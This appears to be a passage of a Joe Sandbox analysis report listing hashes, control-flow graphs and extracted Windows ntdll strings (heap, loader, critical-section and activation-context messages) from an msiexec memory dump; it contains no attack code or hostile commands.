                                            • Instruction ID: 85dd0ead90840e12cde35ea59e6cd74472f0505f6606c34d65c68f5098accc39
                                            • Opcode Fuzzy Hash: 89590b7fcc375701e9f01003361c7acefdff1a6522e90af23c22807e116ed92c
                                            • Instruction Fuzzy Hash: 89B09B71E159D5C9D701E760460870779407BD0705F15C561E3030651F4778D1D5E1B7

                                            Control-flow Graph

                                            Strings
                                            • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 248C54CE
                                            • Critical section address., xrefs: 248C5502
                                            • Critical section address, xrefs: 248C5425, 248C54BC, 248C5534
                                            • 8, xrefs: 248C52E3
                                            • Thread is in a state in which it cannot own a critical section, xrefs: 248C5543
                                            • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 248C54E2
                                            • corrupted critical section, xrefs: 248C54C2
                                            • Address of the debug info found in the active list., xrefs: 248C54AE, 248C54FA
                                            • Thread identifier, xrefs: 248C553A
                                            • Critical section debug info address, xrefs: 248C541F, 248C552E
                                            • double initialized or corrupted critical section, xrefs: 248C5508
                                            • Invalid debug info address of this critical section, xrefs: 248C54B6
                                            • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 248C540A, 248C5496, 248C5519
                                            • undeleted critical section in freed memory, xrefs: 248C542B
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2543609208.0000000024820000.00000040.00001000.00020000.00000000.sdmp, Offset: 24820000, based on PE: true
                                            • Associated: 0000000B.00000002.2543609208.0000000024949000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000B.00000002.2543609208.000000002494D000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000B.00000002.2543609208.00000000249BE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_24820000_msiexec.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                            • API String ID: 0-2368682639
                                            • Opcode ID: 2fe71d3bc217e198272887af9830b7654515ef586e5a2f6476dd22d316f7e84b
                                            • Instruction ID: f4c2d7e2bc0d2540f955fbc93dcbb195cc3ef110ae8acdc71868b8a9726da96a
                                            • Opcode Fuzzy Hash: 2fe71d3bc217e198272887af9830b7654515ef586e5a2f6476dd22d316f7e84b
                                            • Instruction Fuzzy Hash: 3B8168B1A11268EFDB24CF99C894F9EBBF5BB48714F104259F504B7B44D375A940CBA0

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 274 2484d08d-2484d0b6 275 248aa812 274->275 276 2484d0bc-2484d0bf 274->276 278 248aa81c-248aa825 call 24892b60 275->278 276->275 277 2484d0c5-2484d115 call 24895130 call 24892b90 276->277 286 248aa785-248aa79f call 2490b256 277->286 287 2484d11b-2484d12c call 2484d796 277->287 285 248aa82a-248aa82c 278->285 288 248aa832-248aa838 285->288 289 2484d23e-2484d246 285->289 295 2484d1f4-2484d1f9 286->295 296 248aa7a5-248aa7a8 286->296 297 2484d132-2484d135 287->297 298 248aa7e0 287->298 288->289 294 248aa83e-248aa841 288->294 299 248aa843-248aa855 GetPEB call 24863ca0 294->299 300 248aa860-248aa862 294->300 301 2484d204-2484d209 295->301 302 2484d1fb-2484d1ff call 24892b60 295->302 303 248aa7ca-248aa7da call 24892b60 296->303 304 248aa7aa-248aa7be call 2490b1e1 296->304 305 2484d249-2484d24c 297->305 306 2484d13b-2484d140 297->306 316 248aa7ea-248aa804 call 2490b256 298->316 299->300 300->289 301->278 309 2484d20f-2484d214 301->309 302->301 303->298 304->303 328 248aa7c0-248aa7c5 304->328 314 2484d252-2484d25c 305->314 315 2484d329-2484d339 call 2484da02 305->315 311 2484d146-2484d190 call 24895130 call 24892b90 306->311 312 2484d1f2 306->312 318 2484d216-2484d21a call 24892b60 309->318 319 2484d21f-2484d221 309->319 311->316 346 2484d196-2484d1e4 call 24895130 call 24892b90 311->346 312->295 324 2484d262-2484d2ba call 24895130 call 24892b90 314->324 325 2484d33e-2484d340 314->325 315->295 316->295 336 248aa80a-248aa80c 316->336 318->319 319->285 330 2484d227-2484d22a 319->330 332 2484d2bf-2484d2c1 324->332 325->332 328->303 338 248aa7c7-248aa7c9 328->338 330->289 340 2484d22c-2484d238 call 2484db08 330->340 332->315 337 2484d2c3-2484d327 call 24895130 call 24892b90 332->337 336->275 337->315 353 2484d345 337->353 338->303 340->289 350 248aa857-248aa85b 340->350 346->315 356 2484d1ea-2484d1f0 346->356 350->300 353->286 356->295 356->312
                                            Strings
                                            • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 2484D2C3
                                            • \Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 2484D0CF
                                            • Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 2484D262
                                            • Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 2484D146
                                            • @, xrefs: 2484D2AF
                                            • @, xrefs: 2484D313
                                            • @, xrefs: 2484D0FD
                                            • Control Panel\Desktop\LanguageConfiguration, xrefs: 2484D196
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2543609208.0000000024820000.00000040.00001000.00020000.00000000.sdmp, Offset: 24820000, based on PE: true
                                            • Associated: 0000000B.00000002.2543609208.0000000024949000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000B.00000002.2543609208.000000002494D000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000B.00000002.2543609208.00000000249BE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_24820000_msiexec.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration
                                            • API String ID: 0-1356375266
                                            • Opcode ID: 25f23721b1d59b81d0f26a2de5a8e2fa71f7bbc7571336d395de711f0a152c73
                                            • Instruction ID: 54dc99b23697e25476a5cce361fa6577feb111ba4c5b6eaaa66a51cd3f4f0566
                                            • Opcode Fuzzy Hash: 25f23721b1d59b81d0f26a2de5a8e2fa71f7bbc7571336d395de711f0a152c73
                                            • Instruction Fuzzy Hash: CFA13F71928759DFE311CF25C480B5BB7E8BB88719F004A2EFA9896240E7B4D948CF53

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 703 248ff525-248ff547 call 248a7e54 706 248ff549-248ff55e 703->706 707 248ff563-248ff57b call 248476b2 703->707 720 248ff867-248ff876 706->720 711 248ff852 707->711 712 248ff581-248ff59c 707->712 715 248ff855-248ff864 call 248ff879 711->715 713 248ff59e 712->713 714 248ff5a5-248ff5b7 712->714 713->714 717 248ff5bc-248ff5c4 714->717 718 248ff5b9-248ff5bb 714->718 715->720 721 248ff5ca-248ff5cd 717->721 722 248ff7d0-248ff7d9 GetPEB 717->722 718->717 721->722 726 248ff5d3-248ff5d6 721->726 724 248ff7db-248ff7f6 GetPEB call 2484b970 722->724 725 248ff7f8-248ff7fd call 2484b970 722->725 732 248ff802-248ff816 call 2484b970 724->732 725->732 729 248ff5d8-248ff5f0 call 2485ffb0 726->729 730 248ff5f3-248ff616 call 24900cb5 call 24865e70 call 249011a4 726->730 729->730 730->715 743 248ff61c-248ff623 730->743 732->711 744 248ff62e-248ff636 743->744 745 248ff625-248ff62c 743->745 746 248ff638-248ff648 744->746 747 248ff654-248ff658 744->747 745->744 746->747 748 248ff64a-248ff64f call 2490dac6 746->748 749 248ff65a-248ff66d call 24883bc9 747->749 750 248ff688-248ff68e 747->750 748->747 759 248ff67f 749->759 760 248ff66f-248ff67d call 2487fe99 749->760 751 248ff691-248ff69b 750->751 754 248ff6af-248ff6b6 751->754 755 248ff69d-248ff6ad 751->755 757 248ff6b8-248ff6bc call 24900cb5 754->757 758 248ff6c1-248ff6d0 GetPEB 754->758 755->754 757->758 762 248ff73e-248ff749 758->762 763 248ff6d2-248ff6d5 758->763 765 248ff682-248ff686 759->765 760->765 762->715 766 248ff74f-248ff755 762->766 767 248ff6d7-248ff6f2 GetPEB call 2484b970 763->767 768 248ff6f4-248ff6f9 call 2484b970 763->768 765->751 766->715 770 248ff75b-248ff762 766->770 775 248ff6fe-248ff712 call 2484b970 767->775 768->775 770->715 773 248ff768-248ff773 770->773 773->715 776 248ff779-248ff782 GetPEB 773->776 783 248ff715-248ff71f GetPEB 775->783 778 248ff784-248ff79f GetPEB call 2484b970 776->778 779 248ff7a1-248ff7a6 call 2484b970 776->779 786 248ff7ab-248ff7cb call 248f86ba call 2484b970 778->786 779->786 783->715 784 248ff725-248ff739 783->784 784->715 786->783
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2543609208.0000000024820000.00000040.00001000.00020000.00000000.sdmp, Offset: 24820000, based on PE: true
                                            • Associated: 0000000B.00000002.2543609208.0000000024949000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000B.00000002.2543609208.000000002494D000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000B.00000002.2543609208.00000000249BE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_24820000_msiexec.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
                                            • API String ID: 0-1745908468
                                            • Opcode ID: eb5afd4df328bbcbefe12d2f11f86becc1e179ad56dbadb299360b3ebfedbad5
                                            • Instruction ID: aa04a3b1db6f8818363601b34190f2328635f2e842a45ee46582b812c18e8876
                                            • Opcode Fuzzy Hash: eb5afd4df328bbcbefe12d2f11f86becc1e179ad56dbadb299360b3ebfedbad5
                                            • Instruction Fuzzy Hash: 50916831A20684DFDB02CFA8C850A9DBFF1FF59710F95824EE642AB361CB759941CB10
                                            Strings
                                            • Getting the shim engine exports failed with status 0x%08lx, xrefs: 248A9A01
                                            • LdrpInitShimEngine, xrefs: 248A99F4, 248A9A07, 248A9A30
                                            • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 248A9A2A
                                            • apphelp.dll, xrefs: 24846496
                                            • minkernel\ntdll\ldrinit.c, xrefs: 248A9A11, 248A9A3A
                                            • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 248A99ED
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2543609208.0000000024820000.00000040.00001000.00020000.00000000.sdmp, Offset: 24820000, based on PE: true
                                            • Associated: 0000000B.00000002.2543609208.0000000024949000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000B.00000002.2543609208.000000002494D000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000B.00000002.2543609208.00000000249BE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_24820000_msiexec.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                            • API String ID: 0-204845295
                                            • Opcode ID: 02f413e1aa5c1923f70340191751f62ac1bafaa8b64dfe52d5b65513af8b2577
                                            • Instruction ID: 7bd734b0ed662bf01a3c4f95a3882593f4b56748d4570c887b73b1fa81232b6e
                                            • Opcode Fuzzy Hash: 02f413e1aa5c1923f70340191751f62ac1bafaa8b64dfe52d5b65513af8b2577
                                            • Instruction Fuzzy Hash: EB519E71628318DFE321CF24D890E5B7BE4EF94B44F004B1AF595AB264D6B4E984CB92
                                            Strings
                                            • Loading import redirection DLL: '%wZ', xrefs: 248C8170
                                            • LdrpInitializeProcess, xrefs: 2488C6C4
                                            • minkernel\ntdll\ldrredirect.c, xrefs: 248C8181, 248C81F5
                                            • minkernel\ntdll\ldrinit.c, xrefs: 2488C6C3
                                            • LdrpInitializeImportRedirection, xrefs: 248C8177, 248C81EB
                                            • Unable to build import redirection Table, Status = 0x%x, xrefs: 248C81E5
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2543609208.0000000024820000.00000040.00001000.00020000.00000000.sdmp, Offset: 24820000, based on PE: true
                                            • Associated: 0000000B.00000002.2543609208.0000000024949000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000B.00000002.2543609208.000000002494D000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000B.00000002.2543609208.00000000249BE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_24820000_msiexec.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                            • API String ID: 0-475462383
                                            • Opcode ID: 62bde369a78726e964b6a357becfe1e34c3e0e5f8eb31442ec55c9375223f429
                                            • Instruction ID: 7453ae7311c14f953a6c0351499b786de1edf793ac646ebee7e16c2fe5f83eb3
                                            • Opcode Fuzzy Hash: 62bde369a78726e964b6a357becfe1e34c3e0e5f8eb31442ec55c9375223f429
                                            • Instruction Fuzzy Hash: 8F312272629705DFD214DB29DC95E1A7BE0EF94B10F000768FA806B399E664DC04CBA2
                                            Strings
                                            • RtlGetAssemblyStorageRoot, xrefs: 248C2160, 248C219A, 248C21BA
                                            • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 248C2178
                                            • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 248C219F
                                            • SXS: %s() passed the empty activation context, xrefs: 248C2165
                                            • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 248C21BF
                                            • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 248C2180
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2543609208.0000000024820000.00000040.00001000.00020000.00000000.sdmp, Offset: 24820000, based on PE: true
                                            • Associated: 0000000B.00000002.2543609208.0000000024949000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000B.00000002.2543609208.000000002494D000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000B.00000002.2543609208.00000000249BE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_24820000_msiexec.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                            • API String ID: 0-861424205
                                            • Opcode ID: 6d33a74e6abe5b640e0cdcdc202b8d1d063a2b187b8733c1961a9ca279bc055b
                                            • Instruction ID: e3c4d0c45f8616087340cf0ec68ba533c08a88ecd9c865a5f366bec296954206
                                            • Opcode Fuzzy Hash: 6d33a74e6abe5b640e0cdcdc202b8d1d063a2b187b8733c1961a9ca279bc055b
                                            • Instruction Fuzzy Hash: A331E736E21119FBE7119E96CC90F5B7B68DB65A50F05439ABB04BF284D270EE00D7E2
                                            Strings
                                            • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 248C02BD
                                            • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 248C02E7
                                            • RTL: Re-Waiting, xrefs: 248C031E
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2543609208.0000000024820000.00000040.00001000.00020000.00000000.sdmp, Offset: 24820000, based on PE: true
                                            • Associated: 0000000B.00000002.2543609208.0000000024949000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000B.00000002.2543609208.000000002494D000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000B.00000002.2543609208.00000000249BE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_24820000_msiexec.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                            • API String ID: 0-2474120054
                                            • Opcode ID: 3a9833942e1bbec37b87c5d3460ab0f05afcab0b197c8e3dc1fe6dddd3109db4
                                            • Instruction ID: f0503202242db81e5fc671d372ce3d086b7511a75d7ecb33eb6df404b7033642
                                            • Opcode Fuzzy Hash: 3a9833942e1bbec37b87c5d3460ab0f05afcab0b197c8e3dc1fe6dddd3109db4
                                            • Instruction Fuzzy Hash: 0BE1AB34628741DFD715CF69C890B1ABBF0AF893A4F100B69F6A68B2E1D774D944CB42
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2543609208.0000000024820000.00000040.00001000.00020000.00000000.sdmp, Offset: 24820000, based on PE: true
                                            • Associated: 0000000B.00000002.2543609208.0000000024949000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000B.00000002.2543609208.000000002494D000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000B.00000002.2543609208.00000000249BE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_24820000_msiexec.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
                                            • API String ID: 0-1975516107
                                            • Opcode ID: 02f70e9d596916f3170e691a109bfa79d77994a2d8b064544323525e54b5e55b
                                            • Instruction ID: 70d38b01fe98c4cca46186922251add7717f6f9c4d9e7b7829993009305563c7
                                            • Opcode Fuzzy Hash: 02f70e9d596916f3170e691a109bfa79d77994a2d8b064544323525e54b5e55b
                                            • Instruction Fuzzy Hash: 8151DE75A14249DFDB05CFA8C4A4B8DBFF1FF48314F244659E501BB286E7B8A981CB80
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2543609208.0000000024820000.00000040.00001000.00020000.00000000.sdmp, Offset: 24820000, based on PE: true
                                            • Associated: 0000000B.00000002.2543609208.0000000024949000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000B.00000002.2543609208.000000002494D000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000B.00000002.2543609208.00000000249BE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_24820000_msiexec.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlFreeHeap
                                            • API String ID: 0-3061284088
                                            • Opcode ID: 17c3e9bd08a1d32d8f9a89b07855251b63fbaddef4a601e19bf40dd4ec628172
                                            • Instruction ID: b94f0272b9db198d23293a356b9b15915fc4ae741b61d6d66e12f5c6a91e013a
                                            • Opcode Fuzzy Hash: 17c3e9bd08a1d32d8f9a89b07855251b63fbaddef4a601e19bf40dd4ec628172
                                            • Instruction Fuzzy Hash: 07014736434998EFE316D3AAE469F527FE4DF42770F24434AF10047E96DAE898C1C520
                                            Strings
                                            • @, xrefs: 24888591
                                            • LdrpInitializeProcess, xrefs: 24888422
                                            • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 2488855E
                                            • minkernel\ntdll\ldrinit.c, xrefs: 24888421
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2543609208.0000000024820000.00000040.00001000.00020000.00000000.sdmp, Offset: 24820000, based on PE: true
                                            • Associated: 0000000B.00000002.2543609208.0000000024949000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000B.00000002.2543609208.000000002494D000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000B.00000002.2543609208.00000000249BE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_24820000_msiexec.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                            • API String ID: 0-1918872054
                                            • Opcode ID: b773df7722439cb774ba7fee21471a601205994d5848888bb25e78b77d7ee330
                                            • Instruction ID: 8c6adc5bf61117d6c76dca4b0f6491ee9b7a74d5c45e5c657a7ada2164a32c26
                                            • Opcode Fuzzy Hash: b773df7722439cb774ba7fee21471a601205994d5848888bb25e78b77d7ee330
                                            • Instruction Fuzzy Hash: 0A919E71529748EFE721CF65CC40E6BBBE8FF88654F400A2EF68496151E374DA44CB52
                                            Strings
                                            • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 248C22B6
                                            • SXS: %s() passed the empty activation context, xrefs: 248C21DE
                                            • .Local, xrefs: 248828D8
                                            • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 248C21D9, 248C22B1
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2543609208.0000000024820000.00000040.00001000.00020000.00000000.sdmp, Offset: 24820000, based on PE: true
                                            • Associated: 0000000B.00000002.2543609208.0000000024949000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000B.00000002.2543609208.000000002494D000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000B.00000002.2543609208.00000000249BE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_24820000_msiexec.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                            • API String ID: 0-1239276146
                                            • Opcode ID: 944e35992c504d4dfd65eff330432cffbe4456f4dc02bce983dc7f64b75d9bd1
                                            • Instruction ID: 60d90094f5296a1531912ab5b210f5e7f939cbba0d1974d6394b30a9d0c11dbd
                                            • Opcode Fuzzy Hash: 944e35992c504d4dfd65eff330432cffbe4456f4dc02bce983dc7f64b75d9bd1
                                            • Instruction Fuzzy Hash: 0FA1AB35A2122DDBDB25CF64DC84B99B7B0BF58714F1046EAD908AB291D770DE80CF92
                                            Strings
                                            • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 248B1028
                                            • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 248B106B
                                            • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 248B10AE
                                            • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 248B0FE5
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2543609208.0000000024820000.00000040.00001000.00020000.00000000.sdmp, Offset: 24820000, based on PE: true
                                            • Associated: 0000000B.00000002.2543609208.0000000024949000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000B.00000002.2543609208.000000002494D000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000B.00000002.2543609208.00000000249BE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_24820000_msiexec.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                            • API String ID: 0-1468400865
                                            • Opcode ID: 2ae01816dba168a232c611062b3e7362028a065800b192d28a0e15ed23811eaf
                                            • Instruction ID: 38abf51053a15077f39a62ddcd3b124b314dfd0aa8b1e25e065e934cac5d779d
                                            • Opcode Fuzzy Hash: 2ae01816dba168a232c611062b3e7362028a065800b192d28a0e15ed23811eaf
                                            • Instruction Fuzzy Hash: 6371C0B1924304EFD711DF18C884F8B7BA8AF65B64F400668F9489B29AD774D588CFD2
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2543609208.0000000024820000.00000040.00001000.00020000.00000000.sdmp, Offset: 24820000, based on PE: true
                                            • Associated: 0000000B.00000002.2543609208.0000000024949000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000B.00000002.2543609208.000000002494D000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000B.00000002.2543609208.00000000249BE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_24820000_msiexec.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                                            • API String ID: 0-2586055223
                                            • Opcode ID: 9c066fa9b51d0530186c2d313729d4b676e7c430d8f9691829945802a9cee2f7
                                            • Instruction ID: f0659d0b428f1b8d1e238286bb53ec763ef63947427060494127b48cf42f82d8
                                            • Opcode Fuzzy Hash: 9c066fa9b51d0530186c2d313729d4b676e7c430d8f9691829945802a9cee2f7
                                            • Instruction Fuzzy Hash: BB614732265688EFE312CB68C854F677BE8EF84750F040A58FA958B291D7B4D941CB62
                                            Strings
                                            • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 248BA992
                                            • apphelp.dll, xrefs: 24872462
                                            • LdrpDynamicShimModule, xrefs: 248BA998
                                            • minkernel\ntdll\ldrinit.c, xrefs: 248BA9A2
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2543609208.0000000024820000.00000040.00001000.00020000.00000000.sdmp, Offset: 24820000, based on PE: true
                                            • Associated: 0000000B.00000002.2543609208.0000000024949000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000B.00000002.2543609208.000000002494D000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000B.00000002.2543609208.00000000249BE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_24820000_msiexec.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                            • API String ID: 0-176724104
                                            • Opcode ID: ad487151fda837facecc7a76af6d67e45a8a816d24e7f3b332180f0c0ed6c086
                                            • Instruction ID: 76df177a6063a2e3e1b5acd644ca093ed1bbf3bf442490a9a087a8fa9e27551d
                                            • Opcode Fuzzy Hash: ad487151fda837facecc7a76af6d67e45a8a816d24e7f3b332180f0c0ed6c086
                                            • Instruction Fuzzy Hash: 39311871B20205EFD7269FADC890E5ABBB5FF84B10F110259F950BB355C7B45981CB90
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2543609208.0000000024820000.00000040.00001000.00020000.00000000.sdmp, Offset: 24820000, based on PE: true
                                            • Associated: 0000000B.00000002.2543609208.0000000024949000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000B.00000002.2543609208.000000002494D000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000B.00000002.2543609208.00000000249BE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_24820000_msiexec.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: $ $0
                                            • API String ID: 0-3352262554
                                            • Opcode ID: 5f00095b66ca3776090f88ce3ea12c95d1c97be095b60606b2e37fe45855a05a
                                            • Instruction ID: 09bbbbdaec457c60ef05ce6ceed5df40173c3064418fef30eb5dbc84f2b9eb4e
                                            • Opcode Fuzzy Hash: 5f00095b66ca3776090f88ce3ea12c95d1c97be095b60606b2e37fe45855a05a
                                            • Instruction Fuzzy Hash: 9032F1B1618381CFE311CF68C884B5BBBE5BB88344F514A2EF59987350E7B5E948CB52
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2543609208.0000000024820000.00000040.00001000.00020000.00000000.sdmp, Offset: 24820000, based on PE: true
                                            • Associated: 0000000B.00000002.2543609208.0000000024949000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000B.00000002.2543609208.000000002494D000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000B.00000002.2543609208.00000000249BE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
